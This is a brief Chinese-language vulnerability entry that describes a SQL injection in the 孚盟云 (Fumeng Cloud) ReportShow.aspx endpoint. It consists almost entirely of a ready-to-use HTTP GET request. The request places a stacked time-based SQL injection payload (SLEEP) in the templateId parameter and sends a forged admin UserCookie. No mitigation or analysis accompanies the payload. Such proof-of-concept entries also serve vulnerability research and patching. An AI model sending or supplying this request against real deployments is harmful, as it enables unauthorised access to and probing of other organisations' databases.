漏洞描述
孚盟云 ReportShow.aspx SQL注入漏洞
GET /m/Dingding/ActiveReport/ReportShow.aspx?templateId=1'%3BSELECT%2BSLEEP(8)%23 HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Cookie: UserCookie={"empId":"admin","corpId": "1","loginUser":"admin"}
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36